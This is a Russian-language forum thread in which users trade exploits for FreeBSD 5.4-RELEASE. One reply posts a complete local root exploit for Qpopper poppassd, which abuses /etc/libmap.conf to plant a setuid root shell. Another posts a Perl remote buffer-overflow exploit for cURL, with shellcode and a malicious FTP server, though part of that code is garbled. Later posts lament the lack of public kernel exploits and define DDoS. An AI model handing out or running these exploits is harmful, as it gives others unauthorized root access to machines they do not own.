Вот собственно под эту версию FreeBSD 5.4-RELEASE сплойт нужен. В инете обыскал не где не нашёл. У кого есть поделитесь .
вот тебе хорошый сплойт для FreeBSD 5.4-RELEASE PHP: #!/bin/sh ########################################################################### # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ### # tested on FreeBSD 5.4-RELEASE ### ########################################################################### POPPASSD_PATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo "" echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep 2 umask 0000 if [ -f /etc/libmap.conf ]; then echo "OOPS /etc/libmap.conf already exists.. exploit failed!" exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { remove("/etc/libmap.conf"); execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); } } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 echo "--- Now type ENTER ---" echo "" $POPPASSD_PATH -t /etc/libmap.conf echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf su if [ -f /tmp/xxxx ]; then echo "IT'S A ROOTSHELL!!!" /tmp/xxxx else echo "Sorry, exploit failed." fi
Не не подходит ошибки выдаёт . /usr/local/bin/poppassd: not found cannot create /etc/libmap.conf: Permission denied
PHP: #!/usr/bin/perl # # Remote FreeBSD cURL exploit for versions 6.1 - 7.4 # # Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com) # # This exploit may only be used for testing purposes. More information # about the used vulnerability can be found on securityfocus: # # http://online.securityfocus.com/bid/1804 # # The shellcode will write "Ha! Owned by a cURL!" to stdout on the system # running cURL. The extra nops are needed because the buffer, which causes # the overflow, is altered. # # $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/ # Ha! Owned by a cURL! use IO::Socket; use Net::hostent; ######################################################################## $shellcode = "xebx14x5ex31xc0x6ax14x56x40x40x50xb0x04x50xcd". "x80x31xc0x40x50xcdx80xe8xe7xffxffxffx48x61x21". "x20x4fx77x6ex65x64x20x62x79x20x61x20x63x55x52". "x4cx21x23". "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; while($_ = $ARGV[0], /^-/) { shift; last if /^--$/; /^-p/ && do { $port = shift; }; /^-l/ && do { $list = 1; }; /^-o/ && do { $offset = shift; }; } $id = `id -u`; chop($id); $size = 225; $esp = 0xbfbffbd4; $offset = -140 unless $offset; $port = 21 unless $port; if(!$list || $port > 1024 && $id != 0) { print Option: $0 -o Note: low ports require root privileges +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+ TWENTE exit; } for ($i = 0; $i $port, Proto => 'tcp', Listen => 1, Reuse => 1, ); die "Could not create socket: $!n" unless $sock; while($cl = $sock->accept()) { $hostinfo = gethostbyaddr($cl->peeraddr); printf "[Received connect from %s]n", $cl->peerhost; print $cl "220 Safemode.org FTP server (Version 666) ready.n"; print $cl "230 Okn"; print $cl "227 $buffern"; sleep 2; }
SanyaX а ты нашел спойт под эту версию? если нашел поделись плиз...а то весь гугль обыскал ничего не нашел...или в правду под фряху нефига нету сплоитов (в паблике)?....
Все правильно! == в паблике нет local root kernel эксплойтов для FreeBsd => 5.4. Последний master.passwd disclosure exploit (dump in kmem)
Сплоитов под саму фряху и так не много... уточнять надо локальный удаленый.. нужно под демоны разве что смотреть..
DDoS - Distributed Denial of Service = распределенная атака отказа в обслуживании. Это еще более разрушительная атака чем просто DoS.